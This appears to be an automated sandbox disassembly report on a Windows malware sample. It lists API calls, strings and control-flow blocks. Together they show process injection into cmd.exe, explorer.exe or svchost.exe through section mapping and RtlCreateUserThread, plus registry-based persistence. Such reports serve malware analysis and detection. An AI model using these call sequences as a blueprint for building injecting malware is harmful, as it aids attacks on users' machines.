                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${36B5A614-B027-4841-8B7A-585CE588BF9D}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${650443EC-0EFE-4819-82E8-5F93F6D2E6A5}${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}${BBE56B4F-CBD4-4E5B-AF23-B7BA3CDDF0CA}${C3397568-8840-4085-8F6E-BC07C085BB3B}${C55632B1-A307-4128-9468-89792C176C2F}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${EF67FEC6-3B78-4CEC-ADF5-E05B5411BD4E}${F064C698-006D-4351-BA2C-625A53964F8D}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 3630785697-3688416082
                                                                            • Opcode ID: 5b500a7ed035ac9c4b9d71381fe93ee49b5789adefea8792349dd82e797f1d7f
                                                                            • Instruction ID: 82177fc17e21716b0112d74f810aac290c314367be4c18b80b13cc8e18b6a782
                                                                            • Opcode Fuzzy Hash: 5b500a7ed035ac9c4b9d71381fe93ee49b5789adefea8792349dd82e797f1d7f
                                                                            • Instruction Fuzzy Hash: 8F6270B0A40218DBEB209F60EC8DF9977B5BF85705F5044BDF609A6291DBB89AC0CF51

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D38D9
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007D38E9
• _memset.LIBCMT ref: 007D3906
• lstrcpyW.KERNEL32(?,?), ref: 007D3919
  • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
• _memset.LIBCMT ref: 007D3940
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,?), ref: 007D398A
• NtCreateSection.NTDLL(00000000,00000006,00000000,000005F0,00000004,08000000,00000000), ref: 007D3A0B
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 007D3A52
• NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D3A60
• NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 007D3AAB
• NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007D3B06
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D3B4F
• NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D3B5D
• NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D3BA8
• NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007D3BF7
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D3C3D
• NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D3C4B
• NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D3C96
• _memmove.LIBCMT ref: 007D3CBE
• _memmove.LIBCMT ref: 007D3CF7
• _memmove.LIBCMT ref: 007D3D30
• lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 007D3D50
• lstrcpyW.KERNEL32(?,USER32.DLL), ref: 007D3D68
• lstrcpyA.KERNEL32(?,LoadLibraryW), ref: 007D3D80
• lstrcpyA.KERNEL32(?,GetProcAddress), ref: 007D3D97
• lstrcpyA.KERNEL32(?,Sleep), ref: 007D3DAF
• lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 007D3DC7
• lstrcpyA.KERNEL32(?,LocalAlloc), ref: 007D3DDE
• lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 007D3DF6
• lstrcpyA.KERNEL32(?,LocalFree), ref: 007D3E0E
• lstrcpyA.KERNEL32(?,CloseHandle), ref: 007D3E25
• lstrcpyA.KERNEL32(?,VirtualFree), ref: 007D3E3D
• lstrcpyA.KERNEL32(?,MessageBoxW), ref: 007D3E55
• lstrcpyA.KERNEL32(?,VirtualProtect), ref: 007D3E6C
• _memmove.LIBCMT ref: 007D3EA9
• CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 007D3EC5
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D40C2
  • Part of subcall function 007C5720: GetCurrentProcess.KERNEL32(0083CB2C,?,007D3EE3), ref: 007C5728
  • Part of subcall function 007C5720: IsWow64Process.KERNEL32(00000000,?,007D3EE3), ref: 007C572F
  • Part of subcall function 007C5720: GetProcessHeap.KERNEL32(?,007D3EE3), ref: 007C5735
• GetModuleHandle64.FILE(NTDLL.DLL), ref: 007D3EE8
• GetProcAddress64.FILE(?,?,RtlCreateUserThread), ref: 007D3F0F
• X64Call.FILE(?,?,0000000A,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D3F79
• WaitForSingleObject.KERNEL32(00000000,00001388), ref: 007D3FA0
• ResetEvent.KERNEL32(00000000), ref: 007D3FB3
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D3FD7
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D3FEB
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D3FFF
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4010
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4021
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4032
• NtClose.NTDLL(00000000), ref: 007D403F
• NtClose.NTDLL(00000000), ref: 007D404C
• NtClose.NTDLL(00000000), ref: 007D4059
• CloseHandle.KERNEL32(00000000), ref: 007D4066
• Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007D4073
• ResetEvent.KERNEL32(00000000), ref: 007D40A1
• CloseHandle.KERNEL32(00000000), ref: 007D40AE
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D40D3
• NtClose.NTDLL(00000000), ref: 007D40E0
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D40F4
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4105
• NtClose.NTDLL(00000000), ref: 007D4112
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4126
• NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4137
• NtClose.NTDLL(00000000), ref: 007D4144
• CloseHandle.KERNEL32(?), ref: 007D4151
• CloseHandle.KERNEL32(?), ref: 007D415E
• Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007D416B
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Similarity
• API ID: Section$View$lstrcpy$Unmap$Close$Process$Wow64$CreateCurrent$Handle_memmove$DisableEventRedirection$Reset_memset$Address64CallHandle64HeapModuleObjectProcSingleWait_wcsrchr
• String ID: 777367648777262762$897878765347627341$CloseHandle$D$GetProcAddress$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
APIs
• LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007D811E
• GetProcAddress.KERNEL32(00000000,?), ref: 007D8181
Similarity
• API ID: AddressLibraryLoadProc
• String ID: 5$ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$H$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL$n

Control-flow Graph (rendered graph for the function starting at 7d41e0; image not reproduced)
APIs
• __snwprintf.LIBCMT ref: 007D41FF
• RegCreateKeyExW.KERNELBASE(80000001,?,00000000,00000000,00000000,000F013F,00000000,007C1585,00000000), ref: 007D4226
• RegCloseKey.KERNELBASE(007C1585), ref: 007D4238
• _memset.LIBCMT ref: 007D4246
• GetSystemTime.KERNEL32(?), ref: 007D4265
• SystemTimeToFileTime.KERNEL32(?,?), ref: 007D4276
Strings
• {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D41E9
• SOFTWARE\%s, xrefs: 007D41EE
Similarity
• API ID: Time$System$CloseCreateFile__snwprintf_memset
• String ID: SOFTWARE\%s${DE7C4D5F-E773-43F0-B029-ED407FF538E8}

Control-flow Graph (rendered graph for the function starting at 7d00a0; image not reproduced)
APIs
• GetCommandLineW.KERNEL32 ref: 007D00A6
• CommandLineToArgvW.SHELL32(?,?), ref: 007D00B7
• lstrcmpiW.KERNELBASE(?,{741330C7-73F4-49B6-9258-6679317DED46}), ref: 007D00CC
• lstrcmpiW.KERNEL32(?,{4042FD4A-C237-4861-80BD-1FA24BEF8CE4}), ref: 007D00F1
• IsUserAnAdmin.SHELL32 ref: 007D0109
• OpenEventW.KERNEL32(00100002,00000000,{F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}), ref: 007D0127
• SetEvent.KERNEL32(00000000), ref: 007D013A
• CloseHandle.KERNEL32(00000000), ref: 007D0148
• ExitProcess.KERNEL32 ref: 007D0150
Similarity
• API ID: CommandEventLinelstrcmpi$AdminArgvCloseExitHandleOpenProcessUser
• String ID: {04D458D6-7C6C-445F-AEAD-313D698F1F0A}${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${741330C7-73F4-49B6-9258-6679317DED46}${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F064C698-006D-4351-BA2C-625A53964F8D}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}

Control-flow Graph (rendered graph for the function starting at 7d6410; image not reproduced)
APIs
• LocalAlloc.KERNELBASE(00000040,?), ref: 007D6439
• _wcscat.LIBCMT ref: 007D64A2
• __snwprintf.LIBCMT ref: 007D64E4
• _wcscat.LIBCMT ref: 007D64FA
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D652E
• GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 007D6553
• __snwprintf.LIBCMT ref: 007D6595
• _wcscat.LIBCMT ref: 007D65AB
• LocalFree.KERNEL32(00000000), ref: 007D65C1
• SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D65F1
• __snwprintf.LIBCMT ref: 007D6627
• CoTaskMemFree.COMBASE(?), ref: 007D6636
• _wcscat.LIBCMT ref: 007D664A
• SHGetKnownFolderPath.SHELL32(007F7C40,00000000,00000000,?), ref: 007D6683
• __snwprintf.LIBCMT ref: 007D66B9
• CoTaskMemFree.COMBASE(?), ref: 007D66C8
• _wcscat.LIBCMT ref: 007D66DC
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D6710
• GetTempPathW.KERNEL32(00000104,00000000), ref: 007D6735
• LocalFree.KERNEL32(00000000), ref: 007D67AD
  • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
• __snwprintf.LIBCMT ref: 007D6781
• _wcscat.LIBCMT ref: 007D6797
• SHGetKnownFolderPath.SHELL32(007F7C10,00000000,00000000,?), ref: 007D67DD
• __snwprintf.LIBCMT ref: 007D6813
• CoTaskMemFree.COMBASE(?), ref: 007D6822
• _wcscat.LIBCMT ref: 007D6836
• LocalFree.KERNEL32(00000000), ref: 007D685F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wcscat$FreeLocal__snwprintf$Path$AllocFolderKnownTask$DirectoryTempWindows_wcsrchr
                                                                            • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                                                                            • API String ID: 3511546674-4258658051
                                                                            • Opcode ID: b1938e2c59b2461c2997320900da0dfc912f01e709b8b1c8bff9aaaa0475fa10
                                                                            • Instruction ID: d2e9cc714cbc536b5a38876cfce1629ff306a7c562f6eb665051772c0e80932f
                                                                            • Opcode Fuzzy Hash: b1938e2c59b2461c2997320900da0dfc912f01e709b8b1c8bff9aaaa0475fa10
                                                                            • Instruction Fuzzy Hash: 00B171B1A4021DEBDB24DB50DC8DFE9B779BB64304F1085A9E109AB290D778DE85CF50

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memset$__snwprintf$Directory$FileModuleNameSystemWindows
                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                            • API String ID: 60459999-2596767422
                                                                            • Opcode ID: c69e1446d9556d37172952188f657aa947c06a78b8c9009afcd80fc42b2288f9
                                                                            • Instruction ID: 54ce2261374929e80f83551c369e34e50fe00bb3d9ee403ec134ffd0d4d29107
                                                                            • Opcode Fuzzy Hash: c69e1446d9556d37172952188f657aa947c06a78b8c9009afcd80fc42b2288f9
                                                                            • Instruction Fuzzy Hash: 6741A8B5A10318AAD760EB709C4AFFA73786F48700F0085D8B619E7181FBB48B94CB95

                                                                             Control-flow Graph (image omitted; legend: Executed / Not Executed). Basic blocks as id: address range, calls -> successors:
                                                                             • 664: 7d42a0-7d42f2, call 7e3520, GetModuleFileNameW -> 667, 668
                                                                             • 667: 7d42f8-7d431b, call 7dc570 -> 668, 672
                                                                             • 668: 7d43c6 -> 670
                                                                             • 670: 7d43c8-7d43cb
                                                                             • 672: 7d4321-7d4361, call 7e359a, RegOpenKeyExW -> 675, 676
                                                                             • 675: 7d43b9-7d43c0, LocalFree -> 668
                                                                             • 676: 7d4363-7d4389, RegSetValueExW -> 677, 678
                                                                             • 677: 7d43ac-7d43b3, RegCloseKey -> 675
                                                                             • 678: 7d438b-7d43aa, RegCloseKey, LocalFree -> 670
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007D42D4
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007D42EA
                                                                              • Part of subcall function 007DC570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,007D430B,?,00000000), ref: 007DC58C
                                                                              • Part of subcall function 007DC570: GetFileSize.KERNEL32(000000FF,00000000,?,007D430B,?), ref: 007DC5A1
                                                                              • Part of subcall function 007DC570: LocalAlloc.KERNELBASE(00000040,000000FF,?,007D430B), ref: 007DC5B6
                                                                              • Part of subcall function 007DC570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 007DC5D7
                                                                              • Part of subcall function 007DC570: CloseHandle.KERNELBASE(000000FF), ref: 007DC5ED
                                                                            • __snwprintf.LIBCMT ref: 007D4337
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 007D4359
                                                                            • RegSetValueExW.KERNELBASE(?,{CE0CD485-D472-437F-80D7-DAF95EA046F4},00000000,00000003,00000000,00000000), ref: 007D4381
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D4392
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D439F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D43B3
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D43C0
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D4321
                                                                            • {CE0CD485-D472-437F-80D7-DAF95EA046F4}, xrefs: 007D4375
                                                                            • SOFTWARE\%s, xrefs: 007D4326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${CE0CD485-D472-437F-80D7-DAF95EA046F4}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3609211549-896602482
                                                                            • Opcode ID: de36bd278f0b2e18bcd121001f5e2a17d3555f9f3f7ca0e5f50941f63319835a
                                                                            • Instruction ID: b3f1fd11e0f0797bf2bae27706f1fd1c07c70ea258fff61ef265e4a81dd64c41
                                                                            • Opcode Fuzzy Hash: de36bd278f0b2e18bcd121001f5e2a17d3555f9f3f7ca0e5f50941f63319835a
                                                                            • Instruction Fuzzy Hash: 9821A8B5A40318ABD720DB64DC4DFEA7778BF44700F004AD8B61CA6281E7B89E84CF91

                                                                             Control-flow Graph (image omitted; legend: Executed / Not Executed). Basic blocks as id: address range, calls -> successors:
                                                                             • 679: 7cff10-7cff2b, SHGetKnownFolderPath -> 680, 681
                                                                             • 680: 7cffff -> 682
                                                                             • 681: 7cff31-7cff45, LocalAlloc -> 683, 684
                                                                             • 682: 7d0001-7d0004
                                                                             • 683: 7cff4b-7cff72, wnsprintfW -> 685, 686
                                                                             • 684: 7cfff5-7cfff9, CoTaskMemFree -> 680
                                                                             • 685: 7cffeb-7cffef, LocalFree -> 684
                                                                             • 686: 7cff74-7cff80, call 7d0400 -> 685, 689
                                                                             • 689: 7cff82-7cffa7, CreateDirectoryW -> 690, 691
                                                                             • 690: 7cffa9-7cffb4, GetLastError -> 691, 692
                                                                             • 691: 7cffb6-7cffd9, LocalFree * 2, CoTaskMemFree -> 682
                                                                             • 692: 7cffdb-7cffdf -> 685, 693
                                                                             • 693: 7cffe1-7cffe5, LocalFree -> 685
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,00831178,?,?,?,?,007C15DF,00831178), ref: 007CFF23
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,007C15DF,00831178), ref: 007CFF38
                                                                            • wnsprintfW.SHLWAPI ref: 007CFF67
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00831178), ref: 007CFFEF
                                                                              • Part of subcall function 007D0400: AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D044D
                                                                              • Part of subcall function 007D0400: _memset.LIBCMT ref: 007D0463
                                                                              • Part of subcall function 007D0400: SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 007D04A0
                                                                              • Part of subcall function 007D0400: LocalAlloc.KERNEL32(00000040,00000014), ref: 007D04B3
                                                                              • Part of subcall function 007D0400: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 007D04C8
                                                                              • Part of subcall function 007D0400: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 007D04DE
                                                                            • CreateDirectoryW.KERNELBASE(?,0000000C), ref: 007CFF9E
                                                                            • GetLastError.KERNEL32 ref: 007CFFA9
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFFBA
                                                                            • LocalFree.KERNELBASE(?), ref: 007CFFC4
                                                                            • CoTaskMemFree.COMBASE(00831178), ref: 007CFFCE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFFE5
                                                                            • CoTaskMemFree.COMBASE(00831178), ref: 007CFFF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocDescriptorInitializeSecurityTask$AllocateCreateDaclDirectoryEntriesErrorFolderKnownLastPath_memsetwnsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 4260852628-4073750446
                                                                            • Opcode ID: d59e5eb9270a574419fef29d7b158aaaf5e20772189d6816b13c1691faa3aad9
                                                                            • Instruction ID: e48fb40bec8205a17f93a5f83ae3d7716586714015e76d5cc516ac278ec0bf15
                                                                            • Opcode Fuzzy Hash: d59e5eb9270a574419fef29d7b158aaaf5e20772189d6816b13c1691faa3aad9
                                                                            • Instruction Fuzzy Hash: D6211075900208EBDB14DFA8DC49FADBB79FF84701F10886DF605E6290CB789A80CB50

                                                                             Control-flow Graph (image omitted; legend: Executed / Not Executed). Basic blocks as id: address range, calls -> successors:
                                                                             • 694: 7d6870-7d688d, LocalAlloc -> 695, 696
                                                                             • 695: 7d6991 -> 697
                                                                             • 696: 7d6893-7d68a4, GetSystemDirectoryW -> 698, 699
                                                                             • 697: 7d6993-7d6996
                                                                             • 698: 7d68aa-7d68be, LocalAlloc -> 699, 700
                                                                             • 699: 7d6987-7d698b, LocalFree -> 695
                                                                             • 700: 7d68c4-7d6960, call 7d79f0, call 7e359a, call 7e3520, CreateProcessW -> 707, 708
                                                                             • 707: 7d697d-7d6981, LocalFree -> 699
                                                                             • 708: 7d6962-7d697b, LocalFree * 2 -> 697
                                                                            APIs
                                                                            • LocalAlloc.KERNELBASE(00000040,0000FFFE), ref: 007D6880
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007D689C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D68B1
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • __snwprintf.LIBCMT ref: 007D68FD
                                                                            • _memset.LIBCMT ref: 007D6910
                                                                            • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007D6957
                                                                            • LocalFree.KERNELBASE(00000000), ref: 007D6966
                                                                            • LocalFree.KERNELBASE(00000000), ref: 007D6970
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6981
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D698B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                            • String ID: D
                                                                            • API String ID: 2329958830-2746444292
                                                                            • Opcode ID: cbf67f672c1fe251bd5a68dde8749226b0170ade989cf66aaa034af2c6d253f7
                                                                            • Instruction ID: e008570c719285342af986a35a01b3d0a291d8e3b3f45ecde1286c6aae6bcf6e
                                                                            • Opcode Fuzzy Hash: cbf67f672c1fe251bd5a68dde8749226b0170ade989cf66aaa034af2c6d253f7
                                                                            • Instruction Fuzzy Hash: D53146B5A40208FBDB14DBA4DC4DFED7B79BF88700F1045A9F605AB290DB756A84CB50

                                                                             Control-flow Graph (image omitted; legend: Executed / Not Executed). Basic blocks as id: address range, calls -> successors:
                                                                             • 709: 7d43d0-7d440e, call 7e3520, GetModuleFileNameW -> 712, 713
                                                                             • 712: 7d44aa -> 715
                                                                             • 713: 7d4414-7d4454, call 7e359a, RegOpenKeyExW -> 712, 717
                                                                             • 715: 7d44ac-7d44af
                                                                             • 717: 7d4456-7d4487, lstrlenW, RegSetValueExW -> 718, 719
                                                                             • 718: 7d449d-7d44a4, RegCloseKey -> 712
                                                                             • 719: 7d4489-7d449b, RegCloseKey -> 715
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007D43F0
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007D4406
                                                                            • __snwprintf.LIBCMT ref: 007D442A
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 007D444C
                                                                            • lstrlenW.KERNEL32(?), ref: 007D445D
                                                                            • RegSetValueExW.KERNELBASE(?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000000,00000001,?,00000002), ref: 007D447F
